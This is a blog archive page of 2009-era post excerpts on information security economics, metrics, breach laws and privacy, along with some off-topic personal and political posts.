The Workshop on the Economics of Information Security (WEIS) is the leading forum for interdisciplinary scholarship on information security, combining expertise from the fields of economics, social science, business, law, policy and computer science.

 

Practices: Proven vs. Standard?

In comments yesterday, both Kyle Maxwell and Nicko suggested that “standard” is a better adjective than “proven:” I like Kyle’s “standard” practice, since it makes it clear that you are just following the flock for safety by sticking to them. Perhaps we should call them “flocking standard practice” I do think there’s an important difference, […]

 

How to Use the "Think" Best Practice

After I posted the new Best Practice: Think, Dennis Fisher tweeted “Never catch on. Nothing for vendors (or Gartner) to sell.” Which is true, but that’s not the point. The point is to be able to ju-jitsu your best-practice cargo-culter into submission. For example: Cargo-culter: We don’t need a review, this project complied with all […]

 

Quick Thought: Scenario Planning

I spent yesterday in a workshop learning about and practicing scenario planning. It’s a really great tool for planning for (as opposed to predicting) the future. It feels like it’s a great addition to the risk assessment/management process. Check it out.

 

Visual Notetaking

I’m a big fan of the book “Back of the Napkin” which is all about using pictures to help with problem solving. Yesterday, I was introduced to a related concept “visual notetaking” where you use images to support other notes you are taking during a meeting. I’m at a two day workshop and we have […]

 

"As far as I know, effective immediately"

Asked about the timing, the unbriefed propaganda minister mumbled: “As far as I know, effective immediately.” When that was reported on television, the Berliners were off. Baffled border guards who would have shot their “comrades” a week earlier let the crowd through—and a barrier that had divided the world was soon being gleefully dismantled. West […]

 

Mini Metricon 4.5 Call for Participation

[Posting this here to help get the word out – Chris ] Mini MetriCon 4.5 will be a one-day event, Monday, March 1, 2010, in San Francisco, California. Through the cooperation of RSA, the workshop will be held at the University of San Francisco, within walking distance of the Moscone Center, the location of the […]

 
 

2 Proposed Breach Laws move forward

See George Hulme, “National Data Breach Law Steps Closer To Reality ” and Dennis Fisher “http://threatpost.com/en_us/blogs/two-data-breach-notification-bills-advance-senate-110609.” Dennis flags this awe-inspiring exception language: “rendered indecipherable through the use of best practices or methods, such as redaction, access controls, or other such mechanisms, that are widely accepted as an effective industry practice, or an effective industry standard.” […]

 

On smelly goats, unicorns, and FUD

Unicorns (of some sort) are not impossible in principle, only non-existent in recent times. As evidence, I offer Tsintaosaurus spinorhinus, a real dinosaur found in China. Though we may be comfortable with our current “smelly, ugly goat” practices, including the ethically questionable FUD tactic, they only perpetuate the problems and, at worst, are like peeing in the swimming pool.

 

Apologies to Richard Bejtlich

The previous blog post, “Just say ‘no’ to FUD”, described Richard Bejtlich’s post at Tao of Security as “FUD in other clothing”. That was over-reaching. I apologize. There was an element of FUD, but my main objection to Richard’s post was due to other reasons.

 

Mini Metricon 4.5 Call For Participation

Mini MetriCon 4.5 will be a one-day event, Monday, March 1, 2010, in San Francisco, California. Through the cooperation of RSA, the workshop will be held at the University of San Francisco, within walking distance of the Moscone Center, the location of the RSA Conference, to be held during the same week. Mini MetriCon attendees […]

 

"A Call for Evidence-Based Security Tools"

Via Schneier: From the Open Access Journal of Forensic Psychology, by a large group of authors: “A Call for Evidence-Based Security Tools“: Abstract: Since the 2001 attacks on the twin towers, policies on security have changed drastically, bringing about an increased need for tools that allow for the detection of deception. Many of the solutions […]

 

Pay for your own dog food

At Microsoft, there’s a very long history of ‘eating your own dogfood’ or using the latest and greatest daily builds. Although today, people seem to use the term “self-host,” which seems evidence that they don’t do either. Eating your own dogfood gives you a decent idea of when it starts to taste ok, which is […]

 

Thank you!

For the opportunity to do this:

 

Detecting Malice

I just finished reading RSnake’s new book Detecting Malice and I can say without a doubt that it is one of the best technical books I have ever read. Furthermore, I can tell you that it is, without a doubt, the best web security book I have ever had the pleasure to read. Imagine a […]

 

Tabletop Science

Mordaxus emailed some of us and said “I hope this doesn’t mean MG has jumped the shark.” What was he talking about? Apparently, ThinkGeek now has a “Molecular Gastronomy Starter Kit.” For those of you who’ve been hiding in a Cheesecake Factory for the past few years, molecular gastronomy is the art of using science […]

 

Seattle: Pete Holmes for City Attorney

I don’t usually say a lot about local issues, but as readers know, I’m concerned about how arbitrary ID checking is seeping into our society. It turns out my friend Eric Rachner is also concerned about this, and was excited when a Washington “Judge said showing ID to cops not required.” So when Eric was […]

 

Just say 'no' to FUD

“Fear, uncertainty, and doubt” (FUD) is a distortion tactic to manipulate decision-makers. You may think it’s good because it can be successful in getting the outcomes you desire. But it’s unethical. FUD is also anti-data and anti-analysis. Don’t do it. It’s the opposite of what we need.

 

Ooops! and Ooops again!

Those of you who’ve heard me speak about the New School with slides have probably heard me refer to this as an astrolabe: Brett Miller just emailed me and asked (as part of a very nice email) “isn’t that an orrery, not an astrolabe?” It appears that I’m going to have to update my commentary. […]

 

Ross Anderson's Psychology & Security page

Ross Anderson has a new Psychology and Security Resource Page. His abstract: A fascinating dialogue is developing between psychologists and security engineers. At the macro scale, societal overreactions to terrorism are founded on the misperception of risk and undertainty, which has deep psychological roots. At the micro scale, more and more crimes involve deception; as […]

 

Fordham report on Children's Privacy

Following the No Child Left Behind mandate to improve school quality, there has been a growing trend among state departments of education to establish statewide longitudinal databases of personally identifiable information for all K-12 children within a state in order to track progress and change over time. This trend is accompanied by a movement to […]

 

Bob Blakley Gets Future Shock Dead Wrong

Bob Blakley has a very thought provoking piece, “Gartner Gets Privacy Dead Wrong.” I really, really like a lot of what he has to say about the technical frame versus the social frame. It’s a very useful perspective, and I went back and forth for a while with titles for my post (The runner up […]

 

Is responsible disclosure dead?

Jeremiah Grossman has an article in SC Magazine, “Businesses must realize that full disclosure is dead.” On Twitter, I asked for evidence, and Jerimiah responded “Evidence of what exactly?” I think the key assertion that I take issue with is bolded in the context below: Unquestionably, zero-day vulnerabilities have an increasing real-world value to many […]

 

The Conch Republic

Apparently, in a sovereign-in-cheeck move, the the Florida Keys have withdrawn from the United States, and declared themselves to be “The Conch Republic.” Their motto is “We seceded where others failed.” Perhaps you haven’t heard of them because they make all the good jokes, making writing about them hard. I heard about them because of […]

 

On the value of 'digital asset value' for security decisions

What good is it to know the economic value of a digital asset for the purposes of making information security decisions? If you can’t make better decisions with this information, then the metric doesn’t have any value. This post discusses alternative uses, especially threshold or sanity checks on security spending. For these purposes, it functions better as a “spotlight” than as a “razor”. Digital Asset Value has other uses, not the least to get InfoSec people to understand Business people and their priorites and vice versa.

 

Something For Soscia, Girardi, & Charlie Manuel

It’s the probabilistic decision making tool for baseball managers.  On the iPhone.  It’s like a business intelligence application in the palm of your hand 🙂 Basically, it takes the probabilistic models of either Win Expectancy or Run Expectancy (any given action has some probability of contributing a run or a win) and given a situation, […]

 

Prisoners in Iran

There are apparently many people being held without charges by Iranian government. But as far as I know, I’ve only ever met one of them, and so wanted to draw attention to his case: During this entire time, our son has had just two short meetings with us for only a few minutes. Please imagine […]

 

Vista Didn't Fail Because of Security

Bruce Schneier points in his blog to an article in The Telegraph in which Steve Ballmer blames the failure of Vista on security. Every security person around should clear their throat loudly. Security is not what made Vista unpalatable. Many people liked Vista. My tech reporter friends not only adored it, but flat couldn’t understand […]

 

Dear ChoicePoint: Lying like a cheap rug undercuts all that

ChoicePoint was supposed to take steps to protect consumer data. But the FTC alleged that in April 2008 the company switched off an internal electronic monitoring system designed to watch customer accounts for signs of unauthorized or suspicious activity. According to the FTC, that safety system remained inactive for four months, during which time unauthorized […]

 

How to Value Digital Assets (Web Sites, etc.)

If you need to do financial justification or economic analysis for information security, especially risk analysis, then you need to value digital assets to some degree of precision and accuracy. There is no unversally applicable and acceptable method. This article presents a method that will assist line-of-business managers to make economically rational decisions consistent with overall enterprise goals and values.

 

RSnakes On A Plane

or why RSnake will never be allowed to play video blackjat or poker at Blackhat ever again. Rsnake’s exploits with the game system on a recent flight are a fabulous read. Makes me wonder just how integrated these systems are with the regular flight systems though. Btw, RSnake, I expect a demo as part of […]

 

You've Got To Move It Move It

Josh Corman had an awesome post over on Fudsec on Friday. It’s so awesomely appropriate to this blog, that I’m sharing it with you. My only complaint is that I wish that I had written instead. Go read it right now.

 

Toyota Stalks Woman, Claims She Consented

In a lawsuit filed Sept. 28 in Los Angeles Superior Court, Amber Duick claims she had difficulty eating, sleeping and going to work during March and April of last year after she received e-mails for five days from a fictitious man called Sebastian Bowler, from England, who said he was on the run from the […]

 

Another good metaphor, killed by science

Wired has a First Look: Dyson’s Blade-Free Wonder Fan Blows Our Minds: Future generations will have no idea why the shit hitting the fan is any worse than it hitting anything else.

 

Speaking in Michigan on Tuesday

Andrew Stewart and I will be speaking at the University of Michigan SUMIT_09 on Tuesday. We’re on 10:30-11:25. If you’re in the area, please come by.

 

Are Security "Best Practices" Unethical?

Anton Chuvakin’s been going old school.  Raising the specter of “risk-less” security via best practices and haunting me like the ghost of blog posts past.   Now my position around best practices in the past has been that they are, to use Jack Jones’ phrase, Infosec “shamansim”.  We do these things because our forefathers do them, […]

 

SECTOR Sniffing: It Smells, as does the Response

Apparently, at the SecTor security conference, someone tapped into the network and posted passwords to a Wall of Sheep. At the SecTor speakers dinner, several attendees were approached by colleagues and informed that their credentials appeared on the “Wall of Shame” for all to see. When questioned about how the encrypted and unencrypted traffic was […]

 

New Best Practice: Think

Since anyone can declare anything a best practice in information security, I’d like to add my favorite to your list. Think. Thank you.

 

Another Long Time Fugitive Arrested

Yesterday, Luis Armando Peña Soltren was arrested after forty years on run for hijacking a plane to Cuba. Soltren “will finally face the American justice system that he has been evading for more than four decades,” said U.S. Attorney Preet Bharara. I understand that Woody Allen, Martin Scorsese and David Lynch are already circulating a […]

 

The Presentation of Self and Everyday Photographs

With the kind help of our awesome readership, Amazon and Glazer’s, I’ve acquired a camera, some books, a tripod, a prime 50mm, a flash diffuser, a polarizing filter, a graduated neutral filter, and some other random photography toys tools. You might question this, but I can quit anytime. Really! I even offered to loan my […]

 

Visual Complexity Web Site

VisualComplexity.com intends to be a unified resource space for anyone interested in the visualization of complex networks. While it may not contain any examples specific to information security, there may be some methods and ideas that can be adapted to InfoSec.

 
 

LCROSS Lunar Impact Friday, 4:30 AM Pacific

So the Lunar Crater Observation and Sensing Satellite has one last sensing task which it will carry out tomorrow morning at 4:30 AM Pacific. That is to dig a big hole in Cabeus (proper) and see if there’s water there. Unfortunately for LCROSS, it doesn’t really have landing jets, which means it will dig a […]

 

Hal Finney's news

Hal Finney has posted some news to LessWrong: A man goes in to see his doctor, and after some tests, the doctor says, “I’m sorry, but you have a fatal disease.” Man: “That’s terrible! How long have I got?” Doctor: “Ten.” Man: “Ten? What kind of answer is that? Ten months? Ten years? Ten what?” […]

 

Tetraktys is the Best Cryptographic Novel Ever

I’ve been remiss in not posting a review of Tetraktys, by Ari Juels. Short review: It’s better written and has better cryptographers than the ones in any Dan Brown novel, but that’s really damning it with faint praise, which it doesn’t deserve. It’s a highly readable first novel by Ari Juels, who is Chief Scientist […]

 

Quick Thoughts on the New Blogging Regulations

I want to congratulate the folks at the FTC, who’ve decided we all need to follow some rules about what bloggers can say. See for example, “ Epicenter The Business of Tech FTC Tells Amateur Bloggers to Disclose Freebies or Be Fined” at Wired. These new rules are documented in an easy to read 81 […]

 

The Cost of a Near-Miss Data Breach

Near misses are very valuable signals regarding future losses. If we ignore them in our cost metrics, we might make some very poor decisions. This example shows that there is a qualitative difference between “ground truth data” (in this case, historical cash flow for data breach events) and overall security metrics, which need to reflect our estimates about the future, a.k.a. risk.

 

Botnet Research

Rob Lemos has a new article up on the MIT Technology Review, about some researchers from UC Santa Barbara who spent several months studying the Mebroot Botnet. They found some fascinating stuff and I’m looking forward to reading the paper when it’s finally published. While the vast majority of infected machines were Windows based (64% […]

 

Punditry: Better Security Through Diversity Of Thinking

I am honored that the kind folks at threapost have asked me to write for them occasionally. My first post is about better security through diversity of thinking which was inspired by pastry chef Shuna Fish Lydon. From her post (which I quoted in mine as well) It is my experience that unless you push […]

 

Changing Expectations around Breach Notice

Earlier this month, the Department of Health and Human Services imposed a “risk of harm” standard on health care providers who lose control of your medical records. See, for example, “Health IT Data Breaches: No Harm, No Foul:” According to HHS’ harm standard, the question is whether access, use or disclosure of the data poses […]

 

MA/NY: Using GPS To Track Cars Requires A Warrant

Jennifer Granick reports that in Massachusetts, Cops Can’t Convert Car Into Tracking Device Without Court’s OK. Connolly decided that the installation of the GPS device was a seizure of the suspect’s vehicle. “When an electronic surveillance device is installed in a motor vehicle, be it a beeper, radio transmitter, or GPS device, the government’s control […]

 
 

Some thoughts on the Olympics, Chicago and Obama

So the 2016 Olympics will be in Rio de Janeiro. Some people think this was a loss for Obama, but Obama was in a no-win situation. His ability to devote time to trying to influence the Olympics is strongly curtailed by other, more appropriate priorities. If he hadn’t gone to Copenhagen, he would have been […]

 

Models are Distracting

So Dave Mortman wrote: I don’t disagree with Adam that we need raw data. He’s absolutely right that without it, you can’t test models. What I was trying to get at was that, even though I would absolutely love to have access to more raw data to test my own theories, it just isn’t realistic […]

 

Security is About Outcomes, FISMA edition

Over at the US Government IT Dashboard blog, Vivek Kundra (Federal CIO), Robert Carey (Navy CIO) and Vance Hitch (DOJ CIO) write: the evolving challenges we now face, Federal Information Security Management Act (FISMA) metrics need to be rationalized to focus on outcomes over compliance. Doing so will enable new and actionable insight into agencies’ […]

 

Meta-Data?

So awhile back, I posted the following to twitter: Thought of the Day: We don’t need to share raw data if we can share meta-data generated using uniform analytical methodologies. Adam, disagreed: @mortman You can’t test & refine models without raw data, & you can’t ask people with the same orientation to bring diverse perspectives. […]

 

Gates Was Hardly An Exception

There was a lot of news when Henry Lewis Gates was arrested back in July, essentially for mouthing off to a cop. What happened was a shame, but what is more of a shame is that this sort of thing isn’t that rate. Time magazine had a recent article about this, Do You Have the […]

 

Happy Banned Books Week!

Quoting Michael Zimmer: [Yesterday was] the start of Banned Books Week 2009, the 28th annual celebration of the freedom to choose what we read, as well as the freedom to select from a full array of possibilities. Hundreds of books are challenged in schools and libraries in the United States each year. Here’s a great […]

 

Podcasts with Amrit

I had fun recording Beyond the Perimiter Episode 48 and 49 with Amrit. I think Amrit asked some of the broadest, most complex questions I’ve been asked, and it was hard to keep the episodes short. Go have a listen!

 
 

A Little Temporary Safety

So I saw this ad on the back of the Economist. (Click for a larger PDF). In reading it, I noticed this exhortation to “support the STANDUP act of 2009:” The STANDUP Act* (H.R. 1895) creates a National Graduated Driver Licensing (GDL) law that [limits nighttime driving, reduces in-car distractions, puts a cap on the […]

 
 

Metrics Abused

Statistically speaking, 6 out of 7 dwarves are not happy. [via zem42]

 

National Cyber Leap Year Summit reports now available

I believe these are the final deliverables: National Cyber Leap Year Summit 2009 Co-Chairs Report — main discussion of metrics is p 26-28 National Cyber Leap Year Summit 2009 Participants’ Ideas Report – main discussion of metrics is p 44-46, p 50-51, and p 106; with related discussion on p 53-54. Also worth noting is […]

 

Happy Emancipation Proclamation Day!

That on the first day of January in the year of our Lord, one thousand eight hundred and sixty-three, all persons held as slaves within any state, or designated part of a state, the people whereof thenceforward, and forever free; and the executive government of the United States [including the military and naval authority thereof] […]

 

Making Sense of the SANS "Top Cyber Security Risks" Report

The SANS Top Cyber Security Risks report has received a lot of positive publicity. I applaud the effort and goals of the study and it may have some useful conclusions. We should have more of this. Unfortunately, the report has some major problems. The main conclusions may be valid but the supporting analysis is either confusing or weak. It would also be good if this study could be extended by adding data from other vendors and service providers.

 

Private Thoughts on Race

So I’m sitting on the plane home from* Seattle, and I had a really interesting conversation on race with the woman next to me. We were talking, and she asked me, why is it so hard to have conversations like this. I thought that the answer we came to was interesting, and insofar as it […]

 

Visualization Friday – Improving a Bad Graphic

We can learn from bad visualization examples by correcting them. This example is from the newly released SANS “Top Cyber Security Risks” report. Their first graphic has a simple message, but due to various misleading visual cues, it’s confusing. A simplified graphic works much better, but they probably don’t need a graphic at all — a bulleted list works just as well. Moral of this story: don’t simply hand your graphics to a designer with the instructions to “make this pretty”. Yes, the resulting graphic may be pretty, but it may lose its essential meaning or it might just be more confusing than enlightening. Someone has to take responsibility for picking the right visualization metaphor and structures.

 

Secret Photo Apps for the iPhone

If you try searching the App store for photo apps, you find all sorts of things to make your photos sepia. Or blurry. Or to draw on them. Which is great, but if you want apps to help you take photographs, they’re sorta hard to find. So here are some links: First up, a reference […]

 

Proskauer Rose Crows "Rows of Fallen Foes!"

Over on their blog, the law firm announces yet another class action suit over a breach letter has been dismissed. Unfortunately, that firm is doing a fine business in getting rid of such suits. I say it’s unfortunate for two reasons: first, the sued business has to lay out a lot of money (not as […]

 

Notes to the Data People

Over on his Guerilla CISO blog, Rybolov suggests that we ask the Data.gov folks for infosec data using their Suggest a data set page. It sounds like a good idea to me! I took his request and built on it. Rather than breaking the flow with quotes and edit marks, I’ll simply say the requests […]

 

Atoms, Photographed

The pictures, soon to be published in the journal Physical Review B, show the detailed images of a single carbon atom’s electron cloud, taken by Ukrainian researchers at the Kharkov Institute for Physics and Technology in Kharkov, Ukraine….To create these images, the researchers used a field-emission electron microscope, or FEEM. They placed a rigid chain […]

 

12 Tips for Designing an InfoSec Risk Scorecard (its harder than it looks)

An “InfoSec risk scorecard” attempts to include all the factors that drive information security risk – threats, vulnerabilities, controls, mitigations, assets, etc. But for the sake of simplicity, InfoSec risk scorecards don’t include any probabilistic models, causal models, or the like. It can only roughly approximate it under simplifying assumptions. This leaves the designer open to all sorts of problems. Here are 12 tips that can help you navigate these difficulty. It’s harder than it looks.

 

BBC Video of Liquid Explosives

The BBC has some really scary video “Detonation of Liquid Explosives.” However, as I thought about it, I grow increasingly confused by what it purports to show, and the implications. At the end of the day, I think there are two possibilities: It’s a fair representation, or it’s not. I’m leaning slightly towards the second. […]

 

This Friday is “Take an Academic Friend to Work Day”

We need more cross-disciplinary research and collaboration in InfoSec. We start on a small scale, starting with people in our professional network. One fertile area of research and collaboration is to apply the latest research in non-standard logic and formal reasoning (a.k.a. AI) to InfoSec risk management problems. The problem is that most of that research reads like Sanskrit unless you are a specialist. Rather than simply post links to academic papers and ask you to read them, let’s use these papers as a vehicle to start a dialog with an academic friend, or a friend-of-friends. Maybe there are some breakthrough ideas in here. Maybe not. Either way, you will have an interesting experience in cross-discipline collaboration on a small scale.

 

Is risk management too complicated and subtle for InfoSec?

Luther Martin, blogger with Voltage Security, has advised caution about using of risk risk management methods for information security, saying it’s “too complicated and subtle” and may lead decision-makers astray. To backup his point, he uses the example of the Two Envelopes Problem in Bayesian (subjectivist) probability, which can lead to paradoxes. Then he posed an analogous problem in information security, with the claim that probabilistic analysis would show that new security investments are unjustified. However, Luther made some mistakes in formulating the InfoSec problem and thus the lessons from Two Envelopes Problem don’t apply. Either way, a reframing into a “possible worlds” analysis resolves the paradoxes and accurately evaluates the decision alternatives for both problems. Conclusion: risk management for InfoSec is complicated and subtle, but that only means it should be done with care and with the appropriate tools, methods, and frameworks. Unsolved research problems remain, but the Two Envelopes Problem and similar are not among them.

 

Caster Semenya, Alan Turing and "ID Management" products

South African runner Caster Semenya won the womens 800-meter, and the attention raised questions about her gender. Most of us tend to think of gender as pretty simple. You’re male or you’re female, and that’s all there is to it. The issue is black and white, if you’ll excuse the irony. There are reports that: […]

 

National Cyber Leap Year: Without a Good Running Start, There Might Be No Leap

The National Cyber Leap Year (NCLY) report coming out in a few weeks might lead to more US government research funding for security metrics in coming years. But that depends on whether the report is compelling to the Feds and Congress. Given the flawed process leading up to the Summit, I have my doubts. Clearly, this NCLY process is not a good model for public-private collaboration going forward.

 

Rebuilding the internet?

Once apon a time, I was uunet!harvard!bwnmr4!adam. Oh, harvard was probably enough, it was a pretty well known host in the uucp network which carried our email before snmp. I was also harvard!bwnmr4!postmaster which meant that at the end of an era, I moved the lab from copied hosts files to dns, when I became […]

 

Metrics: 50% Chance of Injury by Biscuit

The Telegraph reports: More than half of all Britons have been injured by biscuits ranging from scalding from hot tea or coffee while dunking or breaking a tooth eating during a morning tea break, a survey has revealed. Who knew that cookies could be so dangerous? So forget worrying about AV or even seat belts, […]

 

Some Stuff You Might Find Interesting 9-8-2009

IT’S A TAB DUMP Hey,  because of the holiday, I missed posting some stuff for you all about security & visualization last week. So I thought I’d make it up to you today (plus, I’m about to declare Firefox tab bankruptcy, as I tend to find things to mention on the blog here and then […]

 

Make the Smart Choice: Ignore This Label

He said the criteria used by the Smart Choices™ Program™ were seriously flawed, allowing less healthy products, like sweet cereals and heavily salted packaged meals, to win its seal of approval. “It’s a blatant failure of this system and it makes it, I’m afraid, not credible,” Mr. Willett said. […] Eileen T. Kennedy, president of […]

 

Only an idea after a bunch of calculating

Andrew Koppelman has a post on lawprof blog Balkinization, titled “You have no idea:” This data sits uneasily beside a recent study in the American Journal of Medicine of personal bankruptcies in the United States. In 2007, 62% of all personal bankruptcies were driven by medical costs. “Nationally, a quarter of firms cancel coverage immediately […]

 

Non Commercial

If you haven’t listened to Larry Lessig’s 23C3 talk, it’s worthwhile to listen to the argument he makes. As I was listening to it, I was struck by the term non-commercial, and, having given it some thought, think that we need a better word to describe the goals Creative Commons is pursuing. The term non-commercial […]

 

We're all reputable on this bus

There’s an interesting story at Computerworld, “Court allows suit against bank for lax security.” What jumped out at me was Citizens also had claimed that its online banking services were being provided and protected by a highly reputable company. In addition to the third-party security services, Citizens said it had its own measures for protecting […]

 

Ten Years Ago: Reminiscing about Zero-Knowledge

Ten years ago, I left Boston to go work at an exciting startup called Zero-Knowledge Systems. Zero-Knowledge was all about putting the consumer in control of their privacy. Even looking back, I have no regrets. I’m proud of what I was working towards during the internet bubble, and I know a lot of people who […]

 

Sunday Linkage Security/Privacy In The UK

Quarter of a million Welsh profiles added to DNA database since 2000. [I forget who linked to this one.] CCTV in the spotlight: one crime solved for every 1,000 cameras [Via the security metrics mailing list.]

 
 

Cures versus Treatment

A relevant tale of medical survival over at The Reality-Based Community: Three years ago a 39-year-old American man arrived at the haematology clinic of Berlin’s sprawling Charité hospital. (The venerable Charité, one of the great names in the history of medicine, used to be in East Berlin, but it’s now the brand for the merged […]

 

I'm OK When The System Works – Even If It Is A False Alarm

——————————— UPDATE:  @lbhuston gives us the dirty low down here: http://stateofsecurity.com/?p=766 ——————————— This was a test of the emergency broadcast system.  This was only a test, had this been a real change in the Threat Landscape….. You may have read in various media outlets about a little incident that happened yesterday concerning the mailing of […]

 

Visualization Friday – Back From Hiatus

Hey all, sorry it’s been so long since I put up some eye candy.  Today’s posts come from the usual sources (flowing data and other various information design blogs) but I also wanted to point you to a new source of cool: http://www.informationisbeautiful.net/ So without futher adieu, your Visualization Friday Posts (some pertinent to the […]

 

We Live in Public

It’s opening in New York this weekend, and the New York Times has a review.

 

Perfecter than Perfect

So I’m having a conversation with a friend about caller ID blocking. And it occurs to me that my old phone with AT&T, before Cingular bought them, had this nifty feature, “show my caller-ID to people in my phone book.” Unfortunately, my current phone doesn’t have that, because Steve Jobs has declared that “Apple’s goal […]

 

What Are People Willing to Pay for Privacy?

So I was thinking about the question of the value of privacy, and it occurred to me that there may be an interesting natural experiment we can observe, and that is national security clearances in the US. For this post, I’ll assume that security clearances work for their primary purpose, which is to keep foreign […]

 

Mike Dahn Wants to NewSchool PCI

And I couldn’t agree more. Capability and Maturity Model Creation in Information Security — PS – sorry for using “NewSchool” as a verb.

 

Social network privacy study finds identity link to cookies

Quick follow up to Adam’s Monday post New on SSRN. Rob Westervelt over at SearchSecurity.com tells us about a social network privacy study finds identity link to cookies. Turns out that passing unique identifiers in referring URLs isn’t such a smart idea after all. Color me shocked. The full paper is linked to from Rob’s […]

 

Moore's Law is a Factor in This

I remember when Derek Atkins was sending mail to the cypherpunks list, looking for hosts to dedicate to cracking RSA-129. I remember when they announced that “The Magic Words are Squeamish Ossifrage.” How it took 600 people with 1,600 machines months of work and then a Bell Labs supercomputer to work through the data. I […]

 

Renaming the Blog to Emergent Chaos (II)

A little more seriously, the identity of a blog is constructed between the authors, commenters and readers, and I’m continually amazed by what emerges here. At the same time, what’s emerging is currently not very chaotic, and I’m wondering if it’s time for some mixing it up. Suggestions welcome.

 

Renaming the blog to Emergent Chaos (I)

In 2007, Artist Kristin Sue Lucas went before a judge to get a name change to…Kristin Sue Lucas. She’s put together a show called “Refresh” and one called “Before and After.” My favorite part is where the judge wrestles with the question “what happens when you change a thing to itself:” JR: And I don’t […]

 

New on SSRN

There’s new papers by two law professors whose work I enjoy. I haven’t finished the first or started the second, but I figured I’d post pointers, so you’ll have something to read as we here at the Combo improvise around Cage’s 2:33. Paul Ohm has written “Broken Promises of Privacy: Responding to the Surprising Failure […]

 

Suing Into the Box

Todays New York Times has an interesting article “A Lawsuit Tries to Get at Hackers Through the Banks They Attack” about the folks over at Unspam who are suing under the Can-Spam Act in an attempt to get the names of miscreants who have been attacking banks. More interestingly, they are hoping to force the […]

 

Entering Our Prime

Today is amazingly enough the fifth anniversary of Adam starting this blog. It’s amazing how fast time flies when things are chaotic. Seems like just yesterday Adam was doing the initial Star Wars posts. Appropriately enough the most recent in the category was just this past Saturday. Thank you to all of our readers for […]

 

What should the new czar do? (Tanji's Security Survey)

Over at Haft of the Spear, Michael Tanji asks: You are the nation’s new cyber czar/shogun/guru. You know you can’t _force _anyone to do jack, therefore you spend your time/energy trying to accomplish what three things via influence, persuasion, shame and force of will? I think it’s a fascinating question, and posted my answer over […]

 

What should the new czar do? (Tanji's Security Survey)

Over at Haft of the Spear, Michael Tanji asks: You are the nation’s new cyber czar/shogun/guru. You know you can’t _force _anyone to do jack, therefore you spend your time/energy trying to accomplish what three things via influence, persuasion, shame and force of will? My three: De-stigmatize failure. Today, we see the same failures we […]

 

Heartland/TJX/Hannaford hacker caught

I’ve been busy and haven’t had a lot of time to dig in, but Rich Mogull has some really good articles, “Heartland Hackers Caught; Answers and Questions,” and “Recent Breaches- We May Have All the Answers.” I have two questions: Were these custom attacks, or a failure to patch? Reading what’s not in the USSS/FBI […]

 

Mortman/Hutton Security-BSides & Black Hat Presentation Available

Hey y’all, happy Monday morning.   I’ve put Dave & my presentation for Security BSides up on slideshare: http://www.slideshare.net/alexhutton/mortmanhutton-security-bsides-presentation Mortman/Hutton Security B-Sides Presentation View more presentations from alexhutton. Also note that this includes the Black Hat presentation we gave on the Mortman/Hutton Vulnerability/Exploit model.  I hope you will enjoy! PS – There’s probably audio available for […]

 

We Live In Public, The Movie

One of the best ways to upset someone who cares about privacy is to trot out the “nothing to hide, nothing to worry about” line. It upsets me on two levels. First because it’s so very wrong, and second, because it’s hard to refute in a short quip. I think what I like most about […]

 

Spinal Tap, Copyright

There’s a cute little story in the NYTimes, “Lego Rejects a Bit Part in a Spinal Tap DVD.” I read it as I was listening to a podcast on Shepard Fairey vs The Associated Press that Dan Solove pointed out. In that podcast, Dale Cendali (the attorney representing the AP) asserts that licensing is easy, […]

 
 

Hearsay podcast: Shostack on Privacy

Dennis Fisher talks with Microsoft’s Adam Shostack about the Privacy Enhancing Technologies Symposium, the definition of privacy in today’s world and the role of technology in helping to enhance and protect that privacy. As always, a fun conversation with Dennis Fisher. Ran longer than I think either of us expected at 41:15. And speaking of […]

 
 

Heartland CEO and Outrage

Bill Brenner has an interview with Robert Carr, the CEO of Heartland. It’s headlined “Heartland CEO on Data Breach: QSAs Let Us Down.” Some smart security folks are outraged, asserting that Carr should know the difference between compliance and security, and audit and assessment. Examples include Rich Mogull’s “Open Letter to Robert Carr” and Alan […]

 

New Breach Laws

Missouri adds a law with a “risk of harm trigger” aka the full-employment provision for lawyers and consultants. Texas adds health data to their notification list. Most importantly, North Carolina requires notice to their attorney general for breaches smaller than 1,000 people. I think Proskauer here is being a little inaccurate when they characterize this […]

 

Information Security-Don't sweat it

So-called clinical-strength antiperspirants …come with instructions that they be applied before bed for “maximum” protection from wetness and odor. … Even regular-strength antiperspirants work best when applied to underarms at night, experts told us. Bedtime application “really is the best way to use an antiperspirant,” says Daivd Pariser, M.D., president of the American Academy of […]

 

What's in a name?

Brian Jones Tamanaha has an interesting post about our database-driven society. The core of it is that English is bad at recording some names. The solution? Force people to change their official names for the convenience of the database: During public hearings on the voter identification legislation in the House, state Rep. Betty Brown, R-Terrell, […]

 
 
 

Dear $LOCALBANK That I Use

Keeping a database of all of your ATM PINs in a clear (or possibly encrypted but easily reversible) text database is not a good idea. I honestly can’t see any use value for this, especially when they won’t tell you what your PIN is even if you have multiple forms of government issued identification. No […]

 

Quantitative Analysis of Web Application Usefulness (Or Why Your ROSI is wRONG)

The amazing (in both quality and quantity of blog post production) Lori MacVittie of f5 has a blog post up on their corporate blog called,  “A Formula for Quantifying Productivity of Web Applications.” Basically, Lori proposes that we study web server processes and the time to complete them over a period of time rather than […]

 

Television, Explained

So I’m not sure if Michael Pollan’s “Out of the Kitchen, Onto the Couch” is supposed to be a movie review, but it’s definitely worth reading if you think about what you eat. I really like this line: The historical drift of cooking programs — from a genuine interest in producing food yourself to the […]

 

Is Barack Obama an American Citizen?

It might seem, to the average person, that the “Birthers” must have a tough time proving their case. After all, Barack Obama has released his Certification of Live Birth (pictured above), which meets all the requirements for proving one’s citizenship to the State Department. The authenticity of the certificate has been verified by Hawaii state […]

 

Hot Singles Are Waiting for You!

Information anyone gives to Facebook can be used by Facebook to do things Faceook wants to do. Like use your face in a personals ad. Even if Facebook knows you’re married. Facebook used Cheryl Smith’s face this way in an ad that it showed her husband. (“oops”) So go read more in Wife’s face used […]

 

ID Theft Risk Scores?

A bunch of widely read people are blogging about “MyIDscore.com Offers Free ID Theft Risk Score.” That’s Brian Krebs at the Washington Post. See also Jim Harper, “My ID Score.” First, there’s little explanation of how it’s working. I got a 240 when I didn’t give them my SSN, and my score dropped to 40 […]

 
 

To The Moon

One of the really fascinating things about listening to the streaming audio of the first moon landing is how much time was spent debugging the spacecraft, resetting this and that. As the memory fades away, Charlie Stross wrote about the difficulties in going back to the moon: Not only does the cost of putting a […]

 

Identity Theft

Remember Identity Theft isn’t getting your credit card stolen, that’s fraud. Having the records that define who you are to an entire country and determine whether you can get a relatively high paying job get stolen. That’s identity theft…

 

Penetration testing your products

